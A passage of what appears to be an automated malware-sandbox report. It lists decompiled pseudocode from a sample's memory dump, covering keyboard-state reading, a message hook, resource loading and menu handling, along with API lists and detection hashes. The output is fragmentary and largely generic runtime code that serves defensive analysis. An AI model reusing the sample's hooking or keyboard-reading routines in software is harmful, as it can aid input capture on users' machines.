                                                    0x004768c2
                                                    0x004768c5
                                                    0x004768cf
                                                    0x004768db
                                                    0x004768e0
                                                    0x004768f3
                                                    0x004768fb
                                                    0x00476906
                                                    0x0047690b
                                                    0x00476914
                                                    0x00476952
                                                    0x0047696a
                                                    0x0047697a
                                                    0x0047697a
                                                    0x00476916
                                                    0x00476918
                                                    0x00476944
                                                    0x0047691a
                                                    0x00476923
                                                    0x00476933
                                                    0x0047693a
                                                    0x0047693a
                                                    0x00476918
                                                    0x00476981
                                                    0x00476984
                                                    0x00476987
                                                    0x0047699c

                                                    APIs
                                                    • GetKeyboardLayout.USER32 ref: 004768CA
                                                    • GetKeyboardState.USER32(?,00000000,00000000,0047699D), ref: 004768DB
                                                    • MapVirtualKeyExA.USER32(?,00000002,00000000), ref: 004768FF
                                                    • ToAsciiEx.USER32(?,00000000,?,?,00000000,00000000), ref: 00476906
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Keyboard$AsciiLayoutStateVirtual
                                                    • String ID:
                                                    • API String ID: 692081290-0
                                                    • Opcode ID: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                    • Instruction ID: 89de63ba6f27cd6f45779958db8435fcd8f77a32cbffcd1c99df830e07254f94
                                                    • Opcode Fuzzy Hash: 1248bf323bd48c016888fbbeb679fa92d4c20e3ba547b737b312a868d1fbd519
                                                    • Instruction Fuzzy Hash: 9D21B1B05045049EDB10DF15CC82BEA77BAEB59310F05C4B7E988A7341DA38AD408F59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044E7A8 Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0044E7A8(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044DEB4(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E0044DD30(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E0044DD30(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E0040A044(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00409F88(_a12, _t49);
				}
			}










                                                    0x0044e7af
                                                    0x0044e7b1
                                                    0x0044e7b3
                                                    0x0044e7be
                                                    0x00000000
                                                    0x0044e842
                                                    0x0044e7c2
                                                    0x0044e7d2
                                                    0x0044e7ef
                                                    0x0044e7f4
                                                    0x0044e7f9
                                                    0x0044e806
                                                    0x0044e806
                                                    0x0044e7d4
                                                    0x0044e7db
                                                    0x0044e7e8
                                                    0x0044e7e8
                                                    0x0044e80d
                                                    0x00000000
                                                    0x0044e80f
                                                    0x0044e812
                                                    0x0044e821
                                                    0x00000000
                                                    0x0044e829

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Menu$ItemStateString
                                                    • String ID:
                                                    • API String ID: 306270399-0
                                                    • Opcode ID: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                    • Instruction ID: 91f26849067dd0ec4125c5b687d67a274517b3145466c284ab5c31d893fdeaa7
                                                    • Opcode Fuzzy Hash: 2c19fe086be550dc174a8887d2ac99f30179e1944e787361f9f2a990d3dbd57d
                                                    • Instruction Fuzzy Hash: 43118131A05204AFDB00EE6ECC85AAF77E8AF49364B10442AF915D7382DA39DD0197A9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00474C10 Relevance: 6.1, APIs: 4, Instructions: 58libraryCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 55%
                                                    			E00474C10(intOrPtr __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				void* _t19;
				intOrPtr _t35;
				intOrPtr _t36;
				struct HINSTANCE__* _t40;
				void* _t42;
				void* _t43;
				intOrPtr _t44;

				_t42 = _t43;
				_t44 = _t43 + 0xfffffff8;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t42);
				_push(0x474cbf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t44;
				_push(_t42);
				_push(0x474c8c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t44;
				_t40 = LoadLibraryA(E00404E80(_v8));
				_t19 = FindResourceA(_t40, E00404E80(_v12), 0xa);
				if(_t19 != 0) {
				}
				FreeResource(_t19);
				FreeLibrary(_t40);
				_pop(_t35);
				 *[fs:eax] = _t35;
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(0x474cc6);
				return E004049E4( &_v12, 2);
			}












                                                    0x00474c11
                                                    0x00474c13
                                                    0x00474c19
                                                    0x00474c1c
                                                    0x00474c22
                                                    0x00474c2a
                                                    0x00474c31
                                                    0x00474c32
                                                    0x00474c37
                                                    0x00474c3a
                                                    0x00474c3f
                                                    0x00474c40
                                                    0x00474c45
                                                    0x00474c48
                                                    0x00474c59
                                                    0x00474c67
                                                    0x00474c6e
                                                    0x00474c6e
                                                    0x00474c77
                                                    0x00474c7d
                                                    0x00474c84
                                                    0x00474c87
                                                    0x00474ca6
                                                    0x00474ca9
                                                    0x00474cac
                                                    0x00474cbe

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C54
                                                    • FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 00474C67
                                                    • FreeResource.KERNEL32(00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C77
                                                    • FreeLibrary.KERNEL32(00000000,00000000,00000000,00000000,0000000A,00000000,00000000,00474C8C,?,00000000,00474CBF), ref: 00474C7D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeLibraryResource$FindLoad
                                                    • String ID:
                                                    • API String ID: 622515136-0
                                                    • Opcode ID: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                    • Instruction ID: 3bce9edae1ef54d3e8e9fd7389a7dc52dea682d655a911964018c4ee56d4c8a4
                                                    • Opcode Fuzzy Hash: 2b57222de1b4dc2aa53542cd692cdd0052a20a2f8b05dd666ba465e97723cdf0
                                                    • Instruction Fuzzy Hash: AC0108B0A046046FE702AB62CD129BF77ADEBC5724B21857BF804A26D1DB3C5D01C55D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E198 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 82%
                                                    			E0041E198(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E0041E128(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x41e23c
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E0041E128(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x41e23c
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x41dd60
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E0041DD20(_t23, _t25, _t18);
			}

















                                                    0x0041e19f
                                                    0x0041e1a2
                                                    0x0041e1a4
                                                    0x0041e1b4
                                                    0x0041e1b6
                                                    0x0041e1b9
                                                    0x0041e1bb
                                                    0x0041e1be
                                                    0x0041e1c3
                                                    0x0041e1c3
                                                    0x0041e1c4
                                                    0x0041e1ce
                                                    0x0041e1d0
                                                    0x0041e1d3
                                                    0x0041e1d5
                                                    0x0041e1d8
                                                    0x0041e1dd
                                                    0x0041e1de
                                                    0x0041e1e8
                                                    0x0041e1e9
                                                    0x0041e1ed
                                                    0x0041e1f6
                                                    0x0041e201

                                                    APIs
                                                    • FindResourceA.KERNEL32(?,?,?), ref: 0041E1AF
                                                    • LoadResource.KERNEL32(?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1C9
                                                    • SizeofResource.KERNEL32(?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1E3
                                                    • LockResource.KERNEL32(0041DD60,00000000,?,0041E23C,?,0041E23C,?,?,?,00419048,?,00000001,00000000,?,0041E108,?), ref: 0041E1ED
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Resource$FindLoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 3473537107-0
                                                    • Opcode ID: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                    • Instruction ID: 0493972d3240682b7dd301822f78e45fd4f377a97d2dc7c1e7558ac95a832863
                                                    • Opcode Fuzzy Hash: 204fcfa686f8c971b2388dca130c5f5f1713674b05011f6669d9b69ced5a0bbe
                                                    • Instruction Fuzzy Hash: ECF04BB6A042047F9704EE5AAC81DAB77DCEE88364320006EFD08DB342DA38ED4143B9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00438CE0 Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 87%
                                                    			E00438CE0(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x49eb28; // 0x0
					if(GlobalFindAtomA(E00404E80(_t9)) !=  *0x49eb24) {
						_t16 = 0 | E00437E28(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x49eb24 & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                                                    0x00438ce0
                                                    0x00438ce2
                                                    0x00438ce3
                                                    0x00438ce5
                                                    0x00438ce9
                                                    0x00438d00
                                                    0x00438d17
                                                    0x00438d37
                                                    0x00438d19
                                                    0x00438d29
                                                    0x00438d29
                                                    0x00438d17
                                                    0x00438d3f

                                                    APIs
                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00438CED
                                                    • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00438D58,00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438CF6
                                                    • GlobalFindAtomA.KERNEL32(00000000), ref: 00438D0B
                                                    • GetPropA.USER32 ref: 00438D22
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                    • String ID:
                                                    • API String ID: 2582817389-0
                                                    • Opcode ID: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                    • Instruction ID: e92755073dd59f3c21f23970beea19c54b642f04f63fe31ed46c29e0623daff0
                                                    • Opcode Fuzzy Hash: 0bffcbc514aafa585d093ff078779f4e4c909c3ec109cfbb288702f9224ab6dc
                                                    • Instruction Fuzzy Hash: 17F02761B06722539621B3775D8196F518C9E383A8B10453FF840D23C1CA2CFC42C17F
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00458F44 Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00458F44(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x49ebb8; // 0x0
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x49ebd0 == 0) {
						_t2 = SetWindowsHookExA(3, E00458F00, 0, GetCurrentThreadId());
						 *0x49ebd0 = _t2;
					}
					if( *0x49ebcc == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x49ebcc = _t2;
					}
					if( *0x49ebd4 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00458EA4, 0, 0, _t7);
						 *0x49ebd4 = _t2;
					}
				}
				return _t2;
			}





                                                    0x00458f45
                                                    0x00458f51
                                                    0x00458f5a
                                                    0x00458f6c
                                                    0x00458f71
                                                    0x00458f71
                                                    0x00458f7d
                                                    0x00458f87
                                                    0x00458f8c
                                                    0x00458f8c
                                                    0x00458f98
                                                    0x00458fab
                                                    0x00458fb0
                                                    0x00458fb0
                                                    0x00458f98
                                                    0x00458fb6

                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00458F5C
                                                    • SetWindowsHookExA.USER32 ref: 00458F6C
                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00458F87
                                                    • CreateThread.KERNEL32 ref: 00458FAB
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateThread$CurrentEventHookWindows
                                                    • String ID:
                                                    • API String ID: 1195359707-0
                                                    • Opcode ID: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                    • Instruction ID: 57ffb722b27d6620bd0413708f68fc30d075597d86d482f7219fb2c4a52a2897
                                                    • Opcode Fuzzy Hash: 384df75440d72ed728e41f43c57573df01cdbccf644e11b6f14e86c86d3cdf40
                                                    • Instruction Fuzzy Hash: 60F0D0B1A88301AEF710E7269C06F163655A724B1BF10413FF606791D2CFBC64888B1D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00460AA0 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 48%
                                                    			E00460AA0(signed int __eax) {
				signed int _t1;
				signed int _t2;

				_t1 = __eax;
				_push(0);
				L00407638();
				_t2 = __eax;
				_push(0xc);
				_push(__eax);
				L00407380();
				_push(0xe);
				_push(__eax);
				L00407380();
				if(__eax * __eax > 8) {
					 *0x49c08f = 0;
				} else {
					 *0x49c08f = 1;
				}
				_push(_t2);
				_push(0);
				L00407888();
				return _t1;
			}





                                                    0x00460aa0
                                                    0x00460aa2
                                                    0x00460aa4
                                                    0x00460aa9
                                                    0x00460aab
                                                    0x00460aad
                                                    0x00460aae
                                                    0x00460ab5
                                                    0x00460ab7
                                                    0x00460ab8
                                                    0x00460ac3
                                                    0x00460ace
                                                    0x00460ac5
                                                    0x00460ac5
                                                    0x00460ac5
                                                    0x00460ad5
                                                    0x00460ad6
                                                    0x00460ad8
                                                    0x00460adf

                                                    APIs
                                                    • 733AAC50.USER32(00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AA4
                                                    • 733AAD70.GDI32(00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AAE
                                                    • 733AAD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AB8
                                                    • 733AB380.USER32(00000000,00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,00472817,00000000,0047287C,?,00000000,00000000), ref: 00460AD8
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.337852872.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000009.00000002.337842077.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337959100.000000000049B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000009.00000002.337978553.00000000004A5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_WINDOWS.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: B380
                                                    • String ID:
                                                    • API String ID: 120756276-0
                                                    • Opcode ID: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                    • Instruction ID: e5fe4370b8b3d872c1f259c9bd4e612fc1c14159820c3ed1a6be214ca3dc50fe
                                                    • Opcode Fuzzy Hash: f17ef44ababa0ecd0db7bdc76ea68415ab822dc2a75e97f62b80bd756f6888bc
                                                    • Instruction Fuzzy Hash: 2DE08C52A49354A8F26032B90C87B6B094C8B213A9F04443BFD017A1C3E4BD1C4492BF
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0047847C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E0047847C(intOrPtr* __eax, void* __ebx, intOrPtr* __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0, signed int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int* _v28;
				signed int _v32;
				signed int* _v36;
				intOrPtr _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v52;
				char _v84;
				signed int _v1620;
				signed int _t142;
				intOrPtr _t143;
				intOrPtr* _t144;
				intOrPtr _t147;
				signed char _t157;
				signed char _t158;
				signed int* _t165;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t224;
				intOrPtr _t225;
				intOrPtr _t226;
				intOrPtr _t227;
				signed int _t256;
				intOrPtr* _t258;
				void* _t260;
				void* _t261;
				intOrPtr _t262;
				void* _t276;

				_t276 = __fp0;
				_t260 = _t261;
				_t262 = _t261 + 0xfffff9b0;
				_v12 = __ecx;
				_t258 = __edx;
				_v8 = __eax;
				_t224 =  *0x417dc0; // 0x417dc4
				E004053AC( &_v84, _t224);
				_push(_t260);
				_push(0x4787af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t262;
				_v20 = 0;
				_t211 = 0;
				_push(_t260);
				_push(0x47878c);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t262;
				_t256 =  *(__edx + 1) & 0x000000ff;
				if(_t256 > 0x40) {
					_t211 =  *0x49d980; // 0x477e3c
					E0040D200(_t211, 1);
					E00404378();
				}
				if(_t256 == 0) {
					L25:
					_v52 =  &_v1620;
					_v48 = _v12 + 4;
					_v44 = _t256;
					_v40 = 0;
					_t225 =  *_v12;
					_t142 =  *_t258;
					if(0 != 4) {
						__eflags = 0 - 1;
						if(0 == 1) {
							__eflags = _t256;
							if(__eflags == 0) {
								__eflags = _a4;
								if(__eflags != 0) {
									_t142 = 3;
								}
							}
						}
					} else {
						if((_v1620 & 0x00000fff) == 9) {
							_t142 = 8;
						}
						 *_v12 = 0xfffffffd;
						_v48 = _v48 - 4;
						_v40 = _v40 + 1;
					}
					_push(0);
					_push( &_v84);
					_push(_a4);
					_push( &_v52);
					_push(_t142);
					_push(0);
					_t143 =  *0x49d770; // 0x49b500
					_push(_t143);
					_push(_t225);
					_t144 = _v8;
					_push(_t144);
					if( *((intOrPtr*)( *_t144 + 0x18))() != 0) {
						E00478A5C();
					}
					_t207 = _v20;
					if(_t207 == 0) {
						L39:
						_t147 = 0;
						_pop(_t226);
						 *[fs:eax] = _t226;
						_push(0x478793);
						_t208 = _v20;
						if(_t208 == 0) {
							L41:
							return _t147;
						} else {
							goto L40;
						}
						do {
							L40:
							_t208 = _t208 - 1;
							_t147 =  *((intOrPtr*)(_t260 + _t208 * 8 - 0x250));
							_push(_t147);
							L00417E14();
						} while (_t208 != 0);
						goto L41;
					} else {
						do {
							_t207 = _t207 - 1;
							_t148 = _t260 + _t207 * 8 - 0x250;
							_t227 =  *((intOrPtr*)(_t260 + _t207 * 8 - 0x250 + 4));
							_t272 = _t227;
							if(_t227 != 0) {
								E00405950( *_t148,  *_t148, _t227, _t272);
							}
						} while (_t207 != 0);
						goto L39;
					}
				} else {
					_v24 = _a8;
					_v28 = _t260 + (_t256 + _t256) * 8 - 0x650;
					_t209 = 0;
					do {
						_v28 = _v28 - 0x10;
						_t157 =  *((intOrPtr*)(_t258 + _t209 + 3));
						_v16 = _t157 & 0x7f;
						_t158 = _t157 & 0x00000080;
						if(_v16 != 0xa) {
							__eflags = _v16 - 0x48;
							if(_v16 != 0x48) {
								__eflags = _t158;
								if(_t158 == 0) {
									__eflags = _v16 - 0xc;
									if(_v16 != 0xc) {
										 *_v28 = _v16;
										_v28[2] =  *_v24;
										__eflags = _v16 - 5;
										if(_v16 >= 5) {
											__eflags = _v16 - 7;
											if(_v16 <= 7) {
												_t93 =  &_v24;
												 *_t93 =  &(_v24[1]);
												__eflags =  *_t93;
												_v28[3] =  *_v24;
											}
										}
									} else {
										__eflags =  *_v24 - 0x100;
										if( *_v24 != 0x100) {
											_t165 = _v24;
											 *_v28 =  *_t165;
											_v28[1] = _t165[1];
											_t211 = _v28;
											_v28[2] = _t165[2];
											_v28[3] = _t165[3];
											_v24 =  &(_v24[3]);
										} else {
											_v36 = _t260 + _v20 * 8 - 0x250;
											 *_v36 = E00405974(_v24[2], _t211);
											_v36[1] = 0;
											 *_v28 = 8;
											_v28[2] =  *_v36;
											_v20 = _v20 + 1;
										}
									}
									goto L23;
								}
								__eflags = _v16 - 0xc;
								if(_v16 == 0xc) {
									__eflags =  *( *_v24) - 0x100;
									if( *( *_v24) == 0x100) {
										_t211 = 8;
										E00411330( *_v24, 8,  *_v24, _t256, _t276);
									}
								}
								 *_v28 = _v16 | 0x00004000;
								_v28[2] =  *_v24;
								goto L23;
							} else {
								_v32 = _t260 + _v20 * 8 - 0x250;
								__eflags = _t158;
								if(_t158 == 0) {
									 *_v32 = E00405974( *_v24, _t211);
									__eflags = 0;
									 *(_v32 + 4) = 0;
									 *_v28 = 8;
									_v28[2] =  *_v32;
								} else {
									 *_v32 = E00405974( *( *_v24), _t211);
									 *(_v32 + 4) =  *_v24;
									 *_v28 = 0x4008;
									_v28[2] = _v32;
								}
								_v20 = _v20 + 1;
								L23:
								_t98 =  &_v24;
								 *_t98 =  &(_v24[1]);
								__eflags =  *_t98;
								goto L24;
							}
						} else {
							 *_v28 = 0xa;
							_v28[2] = 0x80020004;
						}
						L24:
						_t209 = _t209 + 1;
					} while (_t256 != _t209);
					goto L25;
				}
			}





































                                                    0x0047847c
                                                    0x0047847d
                                                    0x0047847f
                                                    0x00478488
                                                    0x0047848b
                                                    0x0047848d
                                                    0x00478493
                                                    0x00478499
                                                    0x004784a0
                                                    0x004784a1
                                                    0x004784a6
                                                    0x004784a9
                                                    0x004784ae
                                                    0x004784b1
                                                    0x004784b3
                                                    0x004784b4
                                                    0x004784b9
                                                    0x004784bc
                                                    0x004784bf
                                                    0x004784c6
                                                    0x004784c8
                                                    0x004784d5
                                                    0x004784da
                                                    0x004784da
                                                    0x004784e1
                                                    0x004786aa
                                                    0x004786b0
                                                    0x004786b9
                                                    0x004786bc
                                                    0x004786c4
                                                    0x004786ca
                                                    0x004786ce
                                                    0x004786d3
                                                    0x004786fd
                                                    0x00478700
                                                    0x00478702
                                                    0x00478704
                                                    0x00478706
                                                    0x0047870a
                                                    0x0047870c
                                                    0x0047870c
                                                    0x0047870a
                                                    0x00478704
                                                    0x004786d5
                                                    0x004786e4
                                                    0x004786e6
                                                    0x004786e6
                                                    0x004786ee
                                                    0x004786f4
                                                    0x004786f8
                                                    0x004786f8
                                                    0x00478711
                                                    0x00478716
                                                    0x0047871a
                                                    0x0047871e
                                                    0x0047871f
                                                    0x00478720
                                                    0x00478722
                                                    0x00478727
                                                    0x00478728
                                                    0x00478729
                                                    0x0047872c
                                                    0x00478734
                                                    0x00478739
                                                    0x00478739
                                                    0x0047873e
                                                    0x00478743
                                                    0x00478765
                                                    0x00478765
                                                    0x00478767
                                                    0x0047876a
                                                    0x0047876d
                                                    0x00478772
                                                    0x00478777
                                                    0x0047878b
                                                    0x0047878b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00478779
                                                    0x00478779
                                                    0x00478779
                                                    0x0047877a
                                                    0x00478781
                                                    0x00478782
                                                    0x00478787
                                                    0x00000000
                                                    0x00478745
                                                    0x00478745
                                                    0x00478745
                                                    0x00478746
                                                    0x0047874d
                                                    0x00478750
                                                    0x00478752
                                                    0x0047875c
                                                    0x0047875c
                                                    0x00478761
                                                    0x00000000
                                                    0x00478745
                                                    0x004784e7
                                                    0x004784ea
                                                    0x004784f8
                                                    0x004784fb
                                                    0x004784fd
                                                    0x004784fd
                                                    0x00478501
                                                    0x00478510
                                                    0x00478513
                                                    0x00478519
                                                    0x00478533
                                                    0x00478537
                                                    0x004785ad
                                                    0x004785af
                                                    0x004785f6
                                                    0x004785fa
                                                    0x00478675
                                                    0x0047867f
                                                    0x00478682
                                                    0x00478686
                                                    0x00478688
                                                    0x0047868c
                                                    0x0047868e
                                                    0x0047868e
                                                    0x0047868e
                                                    0x0047869a
                                                    0x0047869a
                                                    0x0047868c
                                                    0x004785fc
                                                    0x004785ff
                                                    0x00478604
                                                    0x00478644
                                                    0x0047864c
                                                    0x00478654
                                                    0x0047865a
                                                    0x0047865d
                                                    0x00478666
                                                    0x00478669
                                                    0x00478606
                                                    0x00478610
                                                    0x00478621
                                                    0x00478628
                                                    0x0047862e
                                                    0x0047863c
                                                    0x0047863f
                                                    0x0047863f
                                                    0x00478604
                                                    0x00000000
                                                    0x004785fa
                                                    0x004785b1
                                                    0x004785b5
                                                    0x004785bc
                                                    0x004785c1
                                                    0x004785cf
                                                    0x004785d4
                                                    0x004785d4
                                                    0x004785c1
                                                    0x004785e4
                                                    0x004785ee
                                                    0x00000000
                                                    0x00478539
                                                    0x00478543
                                                    0x00478546
